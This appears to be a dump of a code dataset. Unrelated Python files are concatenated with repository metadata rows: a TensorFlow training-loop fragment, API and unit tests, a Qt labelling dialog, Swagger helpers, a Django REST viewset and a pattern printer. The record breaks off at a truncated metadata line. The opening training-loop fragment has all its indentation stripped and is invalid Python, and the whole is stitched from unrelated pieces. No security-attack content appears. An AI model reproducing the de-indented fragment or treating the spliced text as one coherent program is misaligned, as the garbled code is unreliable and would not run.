init_run_no = sess.run(Net.global_step)
saver.save(save_sess, os.path.join(FLAGS.output_dir, 'model'), global_step=init_run_no)
testWhileTrain(FLAGS, init_run_no) # make sure that testWhileTrain works
# Performing the training
frame_len = (FLAGS.RNN_N*2-1) if FLAGS.pingpang else FLAGS.RNN_N
max_iter, step, start = FLAGS.max_iter, 0, time.time()
if max_iter is None:
if FLAGS.max_epoch is None:
raise ValueError('one of max_epoch or max_iter should be provided')
else:
max_iter = FLAGS.max_epoch * rdata.steps_per_epoch
try:
for step in range(max_iter):
run_step = sess.run(Net.global_step) + 1
fetches = { "train": Net.train, "learning_rate": Net.learning_rate }
if (run_step % FLAGS.display_freq) == 0:
for key, value in zip(Net.update_list_name, Net.update_list_avg):
fetches[str(key)] = value
if (run_step % FLAGS.summary_freq) == 0:
fetches["summary"] = merged
results = sess.run(fetches)
if(step == 0):
print('Optimization starts!!!(Ctrl+C to stop, will try saving the last model...)')
if (run_step % FLAGS.summary_freq) == 0:
print('Run and Recording summary!!')
train_writer.add_summary(results['summary'], run_step)
val_fetches = {}
for name, value in zip(Net.update_list_name[:uplen], Net.update_list):
val_fetches['val_' + name] = value
val_fetches['summary'] = val_merged
val_results = sess.run(val_fetches, feed_dict={useValidat: True})
train_writer.add_summary(val_results['summary'], run_step)
print('-----------Validation data scalars-----------')
for name in Net.update_list_name[:uplen]:
print('val_' + name, val_results['val_' + name])
if (run_step % FLAGS.display_freq) == 0:
train_epoch = math.ceil(run_step / rdata.steps_per_epoch)
train_step = (run_step - 1) % rdata.steps_per_epoch + 1
rate = (step + 1) * FLAGS.batch_size / (time.time() - start)
remaining = (max_iter - step) * FLAGS.batch_size / rate
print("progress epoch %d step %d image/sec %0.1fx%02d remaining %dh%dm" %
(train_epoch, train_step, rate, frame_len,
remaining // 3600, (remaining%3600) // 60))
print("global_step", run_step)
print("learning_rate", results['learning_rate'])
for name in Net.update_list_name:
print(name, results[name])
if (run_step % FLAGS.save_freq) == 0:
print('Save the checkpoint')
saver.save(save_sess, os.path.join(FLAGS.output_dir, 'model'), global_step=int(run_step))
testWhileTrain(FLAGS, run_step)
except KeyboardInterrupt:
if step > 1:
print('main.py: KeyboardInterrupt->saving the checkpoint')
saver.save(save_sess, os.path.join(FLAGS.output_dir, 'model'), global_step=int(run_step))
testWhileTrain(FLAGS, run_step).communicate()
print('main.py: quit')
exit()
print('Optimization done!!!!!!!!!!!!')
| 48.940133
| 120
| 0.653181
|
4a0ead8d2f771422a5baabc7ea892499687bc7c0
| 5,461
|
py
|
Python
|
tests/routes/test_ingress.py
|
LinuxForHealth/connect
|
0bb2edc2923633c68b3247006abe98001605adbd
|
[
"Apache-2.0"
] | 33
|
2020-06-16T11:47:03.000Z
|
2022-03-24T02:41:00.000Z
|
tests/routes/test_ingress.py
|
LinuxForHealth/connect
|
0bb2edc2923633c68b3247006abe98001605adbd
|
[
"Apache-2.0"
] | 470
|
2020-06-12T01:18:43.000Z
|
2022-02-20T23:08:00.000Z
|
tests/routes/test_ingress.py
|
LinuxForHealth/connect
|
0bb2edc2923633c68b3247006abe98001605adbd
|
[
"Apache-2.0"
] | 30
|
2020-06-12T19:36:09.000Z
|
2022-01-31T15:25:35.000Z
|
import pytest
from connect.clients import kafka, nats
from connect.config import get_settings
from connect.workflows.core import CoreWorkflow
from unittest.mock import AsyncMock
@pytest.mark.parametrize(
    "fixture_name,data_format",
    [
        ("x12_fixture", "X12-005010"),
        ("fhir_fixture", "FHIR-R4"),
        ("hl7_fixture", "HL7-V2"),
    ],
)
@pytest.mark.asyncio
async def test_ingress_post(
    fixture_name,
    data_format,
    request,
    async_test_client,
    mock_async_kafka_producer,
    monkeypatch,
    settings,
):
    """
    Parameterized /ingress [POST] test with X12, FHIR, and HL7 inputs.

    :param fixture_name: The name of the pytest fixture used for parameterized testing.
    :param data_format: The expected data format for the test case.
    :param request: The pytest request fixture used to dynamically access test case fixtures
    :param async_test_client: An async test client
    :param mock_async_kafka_producer: Mock async kafka producer used to simulate messaging interactions
    :param monkeypatch: The pytest monkeypatch fixture.
    :param settings: Mocked connect configuration settings.
    """
    fixture = request.getfixturevalue(fixture_name)
    with monkeypatch.context() as m:
        # Stub out Kafka/NATS/workflow sync so the route runs in isolation.
        m.setattr(kafka, "ConfluentAsyncKafkaProducer", mock_async_kafka_producer)
        m.setattr(CoreWorkflow, "synchronize", AsyncMock())
        m.setattr(nats, "get_nats_client", AsyncMock(return_value=AsyncMock()))
        m.setattr(nats, "get_jetstream_context", AsyncMock(return_value=AsyncMock()))
        async with async_test_client as ac:
            # remove external server setting
            settings.connect_external_fhir_servers = []
            ac._transport.app.dependency_overrides[get_settings] = lambda: settings
            actual_response = await ac.post("/ingress", json={"data": fixture})
            assert actual_response.status_code == 200
            actual_json = actual_response.json()
            assert actual_json["uuid"]
            assert actual_json["operation"] == "POST"
            assert actual_json["creation_date"]
            assert actual_json["store_date"]
            assert actual_json["consuming_endpoint_url"] == "/ingress"
            assert actual_json["data"]
            assert actual_json["data_format"] == data_format
            assert actual_json["status"] == "success"
            assert data_format in actual_json["data_record_location"]
            assert actual_json["target_endpoint_urls"] == []
            assert actual_json["ipfs_uri"] is None
            # fix: the original asserted elapsed_storage_time twice in a row
            assert actual_json["elapsed_storage_time"] > 0
            assert actual_json["transmit_date"] is None
            assert actual_json["elapsed_transmit_time"] is None
            assert actual_json["elapsed_total_time"] > 0
            assert actual_json["transmission_attributes"] is None
@pytest.mark.asyncio
async def test_ingress_post_422_error(
    async_test_client, mock_async_kafka_producer, monkeypatch, settings, x12_fixture
):
    """
    /ingress [POST] validation test: a corrupted X12 payload is rejected with 422.

    :param async_test_client: An async test client
    :param mock_async_kafka_producer: Mock async kafka producer used to simulate messaging interactions
    :param monkeypatch: The pytest monkeypatch fixture.
    :param settings: Mocked connect configuration settings.
    """
    # Corrupt the interchange header so format detection/validation fails.
    broken_payload = x12_fixture.replace("ISA", "IPA")
    async with async_test_client as client:
        # remove external server setting
        settings.connect_external_fhir_servers = []
        client._transport.app.dependency_overrides[get_settings] = lambda: settings
        response = await client.post("/ingress", json={"data": broken_payload})
        assert response.status_code == 422
@pytest.mark.asyncio
async def test_edi_upload(
    dicom_fixture,
    tmpdir,
    async_test_client,
    mock_async_kafka_producer,
    monkeypatch,
    settings,
):
    """
    /ingress/upload [POST] test with a DICOM file upload.

    :param dicom_fixture: Fixture providing DICOM file content for the upload.
    :param tmpdir: The pytest tmpdir fixture.
    :param async_test_client: An async test client
    :param mock_async_kafka_producer: Mock async kafka producer used to simulate messaging interactions
    :param monkeypatch: The pytest monkeypatch fixture.
    :param settings: Mocked connect configuration settings.
    """
    with monkeypatch.context() as m:
        # Stub out Kafka/NATS/workflow sync so the route runs in isolation.
        m.setattr(kafka, "ConfluentAsyncKafkaProducer", mock_async_kafka_producer)
        m.setattr(CoreWorkflow, "synchronize", AsyncMock())
        m.setattr(nats, "get_nats_client", AsyncMock(return_value=AsyncMock()))
        m.setattr(nats, "get_jetstream_context", AsyncMock(return_value=AsyncMock()))
        async with async_test_client as ac:
            # remove external server setting
            settings.connect_external_fhir_servers = []
            ac._transport.app.dependency_overrides[get_settings] = lambda: settings
            actual_response = await ac.post(
                "/ingress/upload", files={"file": ("dcm_1.dcm", dicom_fixture)}
            )
            assert actual_response.status_code == 200
            actual_json = actual_response.json()
            assert actual_json["uuid"]
            assert actual_json["operation"] == "POST"
            assert actual_json["creation_date"]
            assert actual_json["store_date"]
            assert actual_json["consuming_endpoint_url"] == "/ingress/upload"
            assert actual_json["data"]
            assert actual_json["data_format"] == "DICOM"
            assert actual_json["status"] == "success"
            assert "DICOM" in actual_json["data_record_location"]
            assert actual_json["target_endpoint_urls"] == []
            assert actual_json["ipfs_uri"] is None
            # fix: the original asserted elapsed_storage_time twice in a row
            assert actual_json["elapsed_storage_time"] > 0
            assert actual_json["transmit_date"] is None
            assert actual_json["elapsed_transmit_time"] is None
            assert actual_json["elapsed_total_time"] > 0
            assert actual_json["transmission_attributes"] is None
| 40.154412
| 103
| 0.718733
|
4a0eadbff7ed2b42375232f7313b96c8b3e1ddde
| 546
|
py
|
Python
|
Symbols/reverse_triangle.py
|
Ashokkommi0001/patterns
|
daa1a1d8f3bc6e021e02a0e34458e2c178fc71d2
|
[
"MIT"
] | 2
|
2021-03-17T12:08:22.000Z
|
2021-03-17T12:11:10.000Z
|
Symbols/reverse_triangle.py
|
Ashokkommi0001/patterns
|
daa1a1d8f3bc6e021e02a0e34458e2c178fc71d2
|
[
"MIT"
] | null | null | null |
Symbols/reverse_triangle.py
|
Ashokkommi0001/patterns
|
daa1a1d8f3bc6e021e02a0e34458e2c178fc71d2
|
[
"MIT"
] | 1
|
2021-03-17T11:49:39.000Z
|
2021-03-17T11:49:39.000Z
|
def for_reverse_triangle():
    """Print a downward-pointing hollow triangle of '*' using for loops.

    Stars appear on row 0 (the top edge), the diagonal where the column
    equals the row, and the anti-diagonal where row + column == 10.
    """
    for line_no in range(6):
        for pos in range(11):
            on_edge = line_no == 0 or pos == line_no or line_no + pos == 10
            if on_edge:
                print("*", end=" ")
            else:
                print(end=" ")
        print()
def while_reverse_triangle():
    """Print the same downward-pointing hollow triangle using while loops."""
    line_no = 0
    while line_no < 6:
        pos = 0
        while pos < 11:
            # Top edge, main diagonal, or anti-diagonal gets a star.
            if line_no == 0 or pos == line_no or line_no + pos == 10:
                print("*", end=" ")
            else:
                print(end=" ")
            pos += 1
        line_no += 1
        print()
| 24.818182
| 56
| 0.388278
|
4a0eae39d62adf3f8072c861b6dc9447f4cdf880
| 2,634
|
py
|
Python
|
src/ape/types/abstract.py
|
miohtama/ape
|
622deb25076d33de0edb3a23449ccdc04c3288cd
|
[
"Apache-2.0"
] | 210
|
2021-04-29T05:42:42.000Z
|
2022-03-31T15:50:17.000Z
|
src/ape/types/abstract.py
|
miohtama/ape
|
622deb25076d33de0edb3a23449ccdc04c3288cd
|
[
"Apache-2.0"
] | 370
|
2021-04-29T01:54:32.000Z
|
2022-03-31T19:19:29.000Z
|
src/ape/types/abstract.py
|
miohtama/ape
|
622deb25076d33de0edb3a23449ccdc04c3288cd
|
[
"Apache-2.0"
] | 25
|
2021-04-29T05:08:50.000Z
|
2022-03-11T20:43:56.000Z
|
import json
from copy import deepcopy
from pathlib import Path
from typing import Any, Dict, Optional, Set, Union
import dataclassy as dc
def update_params(params, param_name, param_type):
    """Deserialize params[param_name] in place via param_type.from_dict.

    No-op when the key is absent or its value is falsy.
    """
    raw = params.get(param_name)
    if raw:
        params[param_name] = param_type.from_dict(raw)
def update_list_params(params, param_name, param_type):
    """Deserialize each element of the list at params[param_name] in place.

    No-op when the key is absent or the list is empty/falsy.
    """
    raw = params.get(param_name)
    if raw:
        params[param_name] = [param_type.from_dict(entry) for entry in raw]
def update_dict_params(params, param_name, param_type):
    """Deserialize every value of the nested dict at params[param_name].

    Mutates the nested dict in place; no-op when the key is absent or
    the nested dict is empty/falsy.
    """
    nested = params.get(param_name)
    if nested:
        for key in nested:
            nested[key] = param_type.from_dict(nested[key])
def remove_empty_fields(data, keep_fields: Optional[Set[str]] = None):
    """Recursively prune falsy values from dicts and lists.

    Booleans are always kept (False is meaningful), as are dict keys
    named in *keep_fields*.  Scalars pass through unchanged.

    NOTE(review): *keep_fields* is not propagated into nested
    containers — presumably intentional (only top-level fields are
    protected); confirm before relying on nested behavior.
    """
    if isinstance(data, dict):
        pruned = {}
        for key, value in zip(data.keys(), map(remove_empty_fields, data.values())):
            if isinstance(value, bool) or (keep_fields and key in keep_fields) or value:
                pruned[key] = value
        return pruned
    if isinstance(data, list):
        return [
            item
            for item in map(remove_empty_fields, data)
            if isinstance(item, bool) or item
        ]
    return data
def to_dict(v: Any) -> Optional[Union[list, dict, str, int, bool]]:
    """Recursively convert *v* into plain JSON-serializable values.

    SerializableType instances delegate to their own to_dict; lists and
    dicts are converted element-wise; str/int/bool/None pass through.

    Raises:
        ValueError: for any other type.
    """
    if isinstance(v, SerializableType):
        return v.to_dict()
    if isinstance(v, dict):
        return {key: to_dict(item) for key, item in v.items()}
    if isinstance(v, list):
        return [to_dict(item) for item in v]  # type: ignore
    if v is None or isinstance(v, (str, int, bool)):
        return v
    raise ValueError(f"Unhandled type '{type(v)}'.")
@dc.dataclass(slots=True, kwargs=True, repr=True)
class SerializableType:
    """Base class for types that serialize to and from plain dicts.

    Subclasses may set _keep_fields_ (fields kept even when empty) and
    _skip_fields_ (fields never serialized).
    """

    _keep_fields_: Set[str] = set()
    _skip_fields_: Set[str] = set()

    def to_dict(self) -> Dict:
        """Serialize public fields, pruning empty values afterwards."""
        serialized = {}
        for name, value in dc.values(self).items():
            # Private fields and explicitly skipped fields are omitted.
            if name.startswith("_") or name in self._skip_fields_:
                continue
            serialized[name] = to_dict(value)
        return remove_empty_fields(serialized, keep_fields=self._keep_fields_)

    @classmethod
    def from_dict(cls, params: Dict):
        """Build an instance from *params* (deep-copied to avoid mutation)."""
        return cls(**deepcopy(params))  # type: ignore
class FileMixin(SerializableType):
    """Adds JSON file persistence to SerializableType subclasses."""

    @classmethod
    def from_file(cls, path: Path):
        """Load an instance from the JSON document at *path*."""
        with path.open("r") as handle:
            return cls.from_dict(json.load(handle))

    def to_file(self, path: Path):
        """Write this instance to *path* as JSON."""
        # NOTE: EIP-2678 specifies document *must* be tightly packed
        # NOTE: EIP-2678 specifies document *must* have sorted keys
        with path.open("w") as handle:
            json.dump(self.to_dict(), handle, indent=4, sort_keys=True)
| 30.627907
| 86
| 0.647684
|
4a0eaecdfc4c1d8218441b30616099ae43d2439c
| 8,150
|
py
|
Python
|
labelme/labelme/widgets/label_dialog.py
|
acejo2208/Drone_Segmentation
|
0f2abebc4e6e209bb6f02d8ab642134a6431f526
|
[
"Apache-2.0"
] | 2
|
2021-07-21T09:19:15.000Z
|
2021-07-22T00:29:43.000Z
|
labelme/labelme/widgets/label_dialog.py
|
acejo2208/Drone_Segmentation
|
0f2abebc4e6e209bb6f02d8ab642134a6431f526
|
[
"Apache-2.0"
] | null | null | null |
labelme/labelme/widgets/label_dialog.py
|
acejo2208/Drone_Segmentation
|
0f2abebc4e6e209bb6f02d8ab642134a6431f526
|
[
"Apache-2.0"
] | 1
|
2021-07-21T09:19:26.000Z
|
2021-07-21T09:19:26.000Z
|
import re
from qtpy import QT_VERSION
from qtpy import QtCore
from qtpy import QtGui
from qtpy import QtWidgets
from labelme.logger import logger
import labelme.utils
QT5 = QT_VERSION[0] == "5"
# TODO(unknown):
# - Calculate optimal position so as not to go out of screen area.
class LabelQLineEdit(QtWidgets.QLineEdit):
    """Line edit that forwards Up/Down key presses to a companion list widget."""

    def setListWidget(self, list_widget):
        # Remember the list widget so arrow keys can drive its selection.
        self.list_widget = list_widget

    def keyPressEvent(self, e):
        # Arrow keys navigate the label list; everything else edits text.
        if e.key() in (QtCore.Qt.Key_Up, QtCore.Qt.Key_Down):
            self.list_widget.keyPressEvent(e)
        else:
            super(LabelQLineEdit, self).keyPressEvent(e)
class LabelDialog(QtWidgets.QDialog):
    """Modal dialog for entering/choosing a shape label, group id, and flags.

    Combines a completing text field (LabelQLineEdit), an optional numeric
    group-id field, a selectable label history list, and per-label flag
    checkboxes driven by regex patterns in ``flags``.
    """

    def __init__(
        self,
        text="Enter object label",
        parent=None,
        labels=None,
        sort_labels=True,
        show_text_field=True,
        completion="startswith",
        fit_to_content=None,
        flags=None,
    ):
        # Default: size the list to fit its column (width) but not rows.
        if fit_to_content is None:
            fit_to_content = {"row": False, "column": True}
        self._fit_to_content = fit_to_content
        super(LabelDialog, self).__init__(parent)
        # Label text field with validation and post-edit trimming.
        self.edit = LabelQLineEdit()
        self.edit.setPlaceholderText(text)
        self.edit.setValidator(labelme.utils.labelValidator())
        self.edit.editingFinished.connect(self.postProcess)
        if flags:
            self.edit.textChanged.connect(self.updateFlags)
        # Group-id field accepts digits only (empty string allowed).
        self.edit_group_id = QtWidgets.QLineEdit()
        self.edit_group_id.setPlaceholderText("Group ID")
        self.edit_group_id.setValidator(
            QtGui.QRegExpValidator(QtCore.QRegExp(r"\d*"), None)
        )
        layout = QtWidgets.QVBoxLayout()
        if show_text_field:
            # Label edit takes 6/8 of the row, group id 2/8.
            layout_edit = QtWidgets.QHBoxLayout()
            layout_edit.addWidget(self.edit, 6)
            layout_edit.addWidget(self.edit_group_id, 2)
            layout.addLayout(layout_edit)
        # buttons
        self.buttonBox = bb = QtWidgets.QDialogButtonBox(
            QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel,
            QtCore.Qt.Horizontal,
            self,
        )
        bb.button(bb.Ok).setIcon(labelme.utils.newIcon("done"))
        bb.button(bb.Cancel).setIcon(labelme.utils.newIcon("undo"))
        # OK goes through validate() so empty labels are rejected.
        bb.accepted.connect(self.validate)
        bb.rejected.connect(self.reject)
        layout.addWidget(bb)
        # label_list
        self.labelList = QtWidgets.QListWidget()
        if self._fit_to_content["row"]:
            self.labelList.setHorizontalScrollBarPolicy(
                QtCore.Qt.ScrollBarAlwaysOff
            )
        if self._fit_to_content["column"]:
            self.labelList.setVerticalScrollBarPolicy(
                QtCore.Qt.ScrollBarAlwaysOff
            )
        self._sort_labels = sort_labels
        if labels:
            self.labelList.addItems(labels)
        if self._sort_labels:
            self.labelList.sortItems()
        else:
            # Unsorted lists can be manually reordered by drag and drop.
            self.labelList.setDragDropMode(
                QtWidgets.QAbstractItemView.InternalMove
            )
        self.labelList.currentItemChanged.connect(self.labelSelected)
        self.labelList.itemDoubleClicked.connect(self.labelDoubleClicked)
        # Let the edit field forward Up/Down keys to the list.
        self.edit.setListWidget(self.labelList)
        layout.addWidget(self.labelList)
        # label_flags
        if flags is None:
            flags = {}
        self._flags = flags
        self.flagsLayout = QtWidgets.QVBoxLayout()
        self.resetFlags()
        layout.addItem(self.flagsLayout)
        self.edit.textChanged.connect(self.updateFlags)
        self.setLayout(layout)
        # completion
        completer = QtWidgets.QCompleter()
        if not QT5 and completion != "startswith":
            # NOTE(review): logger.warn is a deprecated alias of
            # logger.warning — worth updating separately.
            logger.warn(
                "completion other than 'startswith' is only "
                "supported with Qt5. Using 'startswith'"
            )
            completion = "startswith"
        if completion == "startswith":
            completer.setCompletionMode(QtWidgets.QCompleter.InlineCompletion)
            # Default settings.
            # completer.setFilterMode(QtCore.Qt.MatchStartsWith)
        elif completion == "contains":
            completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)
            completer.setFilterMode(QtCore.Qt.MatchContains)
        else:
            raise ValueError("Unsupported completion: {}".format(completion))
        # Completion candidates come from the label list's model.
        completer.setModel(self.labelList.model())
        self.edit.setCompleter(completer)

    def addLabelHistory(self, label):
        """Add *label* to the history list unless already present."""
        if self.labelList.findItems(label, QtCore.Qt.MatchExactly):
            return
        self.labelList.addItem(label)
        if self._sort_labels:
            self.labelList.sortItems()

    def labelSelected(self, item):
        # Selecting a history item copies its text into the edit field.
        self.edit.setText(item.text())

    def validate(self):
        """Accept the dialog only when the trimmed label text is non-empty."""
        text = self.edit.text()
        if hasattr(text, "strip"):
            text = text.strip()
        else:
            # Qt4 QString fallback.
            text = text.trimmed()
        if text:
            self.accept()

    def labelDoubleClicked(self, item):
        # Double-clicking a history item confirms the dialog.
        self.validate()

    def postProcess(self):
        """Trim surrounding whitespace from the edit field after editing."""
        text = self.edit.text()
        if hasattr(text, "strip"):
            text = text.strip()
        else:
            # Qt4 QString fallback.
            text = text.trimmed()
        self.edit.setText(text)

    def updateFlags(self, label_new):
        """Rebuild the flag checkboxes to match the new label text."""
        # keep state of shared flags
        flags_old = self.getFlags()
        flags_new = {}
        for pattern, keys in self._flags.items():
            if re.match(pattern, label_new):
                for key in keys:
                    # Reuse the previous checked state where possible.
                    flags_new[key] = flags_old.get(key, False)
        self.setFlags(flags_new)

    def deleteFlags(self):
        """Remove all flag checkboxes from the layout."""
        for i in reversed(range(self.flagsLayout.count())):
            item = self.flagsLayout.itemAt(i).widget()
            self.flagsLayout.removeWidget(item)
            item.setParent(None)

    def resetFlags(self, label=""):
        """Show unchecked flags for every pattern matching *label*."""
        flags = {}
        for pattern, keys in self._flags.items():
            if re.match(pattern, label):
                for key in keys:
                    flags[key] = False
        self.setFlags(flags)

    def setFlags(self, flags):
        """Replace the flag checkboxes with one per entry in *flags*."""
        self.deleteFlags()
        for key in flags:
            item = QtWidgets.QCheckBox(key, self)
            item.setChecked(flags[key])
            self.flagsLayout.addWidget(item)
            item.show()

    def getFlags(self):
        """Return {flag name: checked state} for the current checkboxes."""
        flags = {}
        for i in range(self.flagsLayout.count()):
            item = self.flagsLayout.itemAt(i).widget()
            flags[item.text()] = item.isChecked()
        return flags

    def getGroupId(self):
        """Return the group id as int, or None when the field is empty."""
        group_id = self.edit_group_id.text()
        if group_id:
            return int(group_id)
        return None

    def popUp(self, text=None, move=True, flags=None, group_id=None):
        """Show the dialog and return (label, flags, group_id) or Nones.

        Returns (None, None, None) when the dialog is cancelled.
        """
        if self._fit_to_content["row"]:
            # +2 for the frame border.
            self.labelList.setMinimumHeight(
                self.labelList.sizeHintForRow(0) * self.labelList.count() + 2
            )
        if self._fit_to_content["column"]:
            self.labelList.setMinimumWidth(
                self.labelList.sizeHintForColumn(0) + 2
            )
        # if text is None, the previous label in self.edit is kept
        if text is None:
            text = self.edit.text()
        if flags:
            self.setFlags(flags)
        else:
            self.resetFlags(text)
        self.edit.setText(text)
        # Pre-select the text so typing replaces it immediately.
        self.edit.setSelection(0, len(text))
        if group_id is None:
            self.edit_group_id.clear()
        else:
            self.edit_group_id.setText(str(group_id))
        items = self.labelList.findItems(text, QtCore.Qt.MatchFixedString)
        if items:
            if len(items) != 1:
                logger.warning("Label list has duplicate '{}'".format(text))
            self.labelList.setCurrentItem(items[0])
            row = self.labelList.row(items[0])
            self.edit.completer().setCurrentRow(row)
        self.edit.setFocus(QtCore.Qt.PopupFocusReason)
        if move:
            # Open the dialog at the mouse cursor position.
            self.move(QtGui.QCursor.pos())
        if self.exec_():
            return self.edit.text(), self.getFlags(), self.getGroupId()
        else:
            return None, None, None
| 34.100418
| 78
| 0.600245
|
4a0eaf8eb3fd7655dd1335902f6d81f9e5885f7d
| 656
|
py
|
Python
|
src/jose/tests/test_utils.py
|
hdknr/jose
|
d872407e9f3b3a0262e6bb1cdb599b5c4c1d9ee4
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
src/jose/tests/test_utils.py
|
hdknr/jose
|
d872407e9f3b3a0262e6bb1cdb599b5c4c1d9ee4
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2015-01-23T09:37:17.000Z
|
2015-01-23T09:37:17.000Z
|
src/jose/tests/test_utils.py
|
hdknr/jose
|
d872407e9f3b3a0262e6bb1cdb599b5c4c1d9ee4
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from jose.utils import base64
class TestBase64(unittest.TestCase):
    """Round-trip tests for the url-safe base64 helpers in jose.utils."""

    def test_base64(self):
        '''
        nose2 jose.tests.test_utils.TestBase64.test_base64
        '''
        # assertEquals is a deprecated alias (removed in Python 3.12);
        # use assertEqual instead.
        self.assertEqual('QWxpY2U', base64.base64url_encode('Alice'))
        self.assertEqual('Qm9i', base64.base64url_encode('Bob'))
        self.assertEqual('Alice', base64.base64url_decode('QWxpY2U'))
        self.assertEqual('Bob', base64.base64url_decode('Qm9i'))
        # '=' must survive an encode/decode round trip.
        self.assertEqual(
            '=',
            base64.base64url_decode(base64.base64url_encode('=')))


if __name__ == '__main__':
    unittest.main()
| 26.24
| 70
| 0.644817
|
4a0eb0275eee12c2ffa3cb47273e2b69f1958b76
| 1,213
|
py
|
Python
|
swaggerpy3_test/loader_test.py
|
darrensessions/swaggerpy3
|
6c41533652c314ca58d420414e62c18f112fc11e
|
[
"BSD-3-Clause"
] | 1
|
2020-06-24T22:44:43.000Z
|
2020-06-24T22:44:43.000Z
|
swaggerpy3_test/loader_test.py
|
darrensessions/swaggerpy3
|
6c41533652c314ca58d420414e62c18f112fc11e
|
[
"BSD-3-Clause"
] | null | null | null |
swaggerpy3_test/loader_test.py
|
darrensessions/swaggerpy3
|
6c41533652c314ca58d420414e62c18f112fc11e
|
[
"BSD-3-Clause"
] | 2
|
2020-03-28T21:09:32.000Z
|
2021-08-06T08:00:47.000Z
|
#!/usr/bin/env python
#
# Copyright (c) 2013, Digium, Inc.
#
import unittest
import swaggerpy
from swaggerpy import swagger_model
class TestProcessor(swagger_model.SwaggerProcessor):
    """Swagger processor that marks the resource listing as processed.

    Used by LoaderTest to verify custom processors run during loading.
    """

    def process_resource_listing(self, resources, context):
        # Flag checked by the loader tests after load_file returns.
        resources['processed'] = True
class LoaderTest(unittest.TestCase):
    """Tests for swaggerpy.load_file against the 1.1 sample resources."""

    def test_simple(self):
        """A plain load surfaces the declared version and models."""
        uut = swaggerpy.load_file('test-data/1.1/simple/resources.json')
        self.assertEqual('1.1', uut['swaggerVersion'])
        decl = uut['apis'][0]['api_declaration']
        self.assertEqual(1, len(decl['models']))
        self.assertEqual(1, len(decl['models']['Simple']['properties']))

    def test_processor(self):
        """Custom SwaggerProcessors run during loading."""
        uut = swaggerpy.load_file('test-data/1.1/simple/resources.json',
                                  processors=[TestProcessor()])
        self.assertEqual('1.1', uut['swaggerVersion'])
        self.assertTrue(uut['processed'])

    def test_missing(self):
        """A missing resource file raises IOError."""
        # assertRaises replaces the try/self.fail/except boilerplate.
        with self.assertRaises(IOError):
            swaggerpy.load_file(
                'test-data/1.1/missing_resource/resources.json')


if __name__ == '__main__':
    unittest.main()
| 28.209302
| 72
| 0.635614
|
4a0eb0710160cc33152a75a9500bba4600f72537
| 2,802
|
py
|
Python
|
apps/questions/views.py
|
ressapanda/fishka-backend
|
c1eb58566dce01c7a011f0093893cd16b6d50875
|
[
"MIT"
] | null | null | null |
apps/questions/views.py
|
ressapanda/fishka-backend
|
c1eb58566dce01c7a011f0093893cd16b6d50875
|
[
"MIT"
] | null | null | null |
apps/questions/views.py
|
ressapanda/fishka-backend
|
c1eb58566dce01c7a011f0093893cd16b6d50875
|
[
"MIT"
] | null | null | null |
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import mixins, status
from rest_framework.decorators import action
from rest_framework.filters import OrderingFilter, SearchFilter
from rest_framework.request import Request
from rest_framework.response import Response
from rest_framework.viewsets import GenericViewSet
from apps.core.views import MultiSerializerMixin
from apps.questions.models import Question
from apps.questions.serializers import BulkCreateQuestionsSerializer, QuestionReadSerializer, QuestionSerializer
class QuestionViewSet(
    MultiSerializerMixin, mixins.CreateModelMixin, mixins.RetrieveModelMixin, mixins.ListModelMixin, GenericViewSet
):
    """
    ViewSet based on Question model.
    list: List every public Question.
    ### This route allows to:
    - Filter by field: *'framework', 'team', 'language', 'difficulty'*
    - Order by field: *'id', 'created_at', 'updated_at'*
    - Search fraze used in fields: *'question'*
    retrieve: Retrieve specific instance of question.
    To correct response you need provide *id* of existing question instance in path.
    create: Create new question.
    To successfully add new question check QuestionSerializer.
    """

    # Only questions marked public are exposed through this API.
    queryset = Question.objects.filter(is_public=True)
    filter_backends = (DjangoFilterBackend, OrderingFilter, SearchFilter)
    filter_fields = ["framework", "team", "language", "difficulty"]
    ordering_fields = ["id", "created_at", "updated_at"]
    search_fields = ["question"]
    # MultiSerializerMixin picks the serializer by the current action name.
    serializers = {
        "bulk_create": BulkCreateQuestionsSerializer,
        "create": QuestionSerializer,
        "default": QuestionReadSerializer,
    }

    @action(detail=False, methods=["post"])
    def bulk_create(self, request: Request) -> Response:
        """
        Create many questions in one request.
        :param request: request object
        :return: List of created questions
        """
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        self.perform_create(serializer)
        headers = self.get_success_headers(serializer.data)
        return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)

    @action(detail=False, methods=["get"])
    def random_list(self, request: Request) -> Response:
        """
        Return random list of questions.
        :param request: request object
        :return: List of random questions
        """
        queryset = self.filter_queryset(self.get_queryset())
        # NOTE(review): a non-numeric 'limit' raises ValueError (HTTP 500)
        # rather than a 400 — confirm whether validation is wanted.
        limit = int(request.query_params.get("limit", 5))
        count = queryset.count()
        if count > limit:
            # order_by("?") shuffles at the database level.
            queryset = queryset.order_by("?")[:limit]
        serializer = self.get_serializer(queryset, many=True)
        return Response(serializer.data)
| 36.38961
| 115
| 0.712348
|
4a0eb17619396e3ecb35b16796d8b3fe736eadb7
| 362
|
py
|
Python
|
strings/tests/test_string_to_integer_ii.py
|
ahcode0919/python-ds-algorithms
|
0d617b78c50b6c18da40d9fa101438749bfc82e1
|
[
"MIT"
] | null | null | null |
strings/tests/test_string_to_integer_ii.py
|
ahcode0919/python-ds-algorithms
|
0d617b78c50b6c18da40d9fa101438749bfc82e1
|
[
"MIT"
] | null | null | null |
strings/tests/test_string_to_integer_ii.py
|
ahcode0919/python-ds-algorithms
|
0d617b78c50b6c18da40d9fa101438749bfc82e1
|
[
"MIT"
] | 3
|
2020-10-07T20:24:45.000Z
|
2020-12-16T04:53:19.000Z
|
from strings.string_to_integer_ii import string_to_integer_ii
def test_string_to_integer_ii():
    """Table-driven check of string-to-integer conversion."""
    cases = {
        "34": 34,
        "100": 100,
        "-12": -12,
        "6": 6,
        "0": 0,
        "+34": 34,
    }
    for text, expected in cases.items():
        assert string_to_integer_ii(text) == expected
| 32.909091
| 61
| 0.726519
|
4a0eb177915819a04f65f5e3e8d84984c6379c9d
| 11,204
|
py
|
Python
|
mayan/apps/appearance/models.py
|
ercusz/Mayan-EDMS
|
46accc39f3f252c43b8d9d2b19478ae7f13bd11d
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/appearance/models.py
|
ercusz/Mayan-EDMS
|
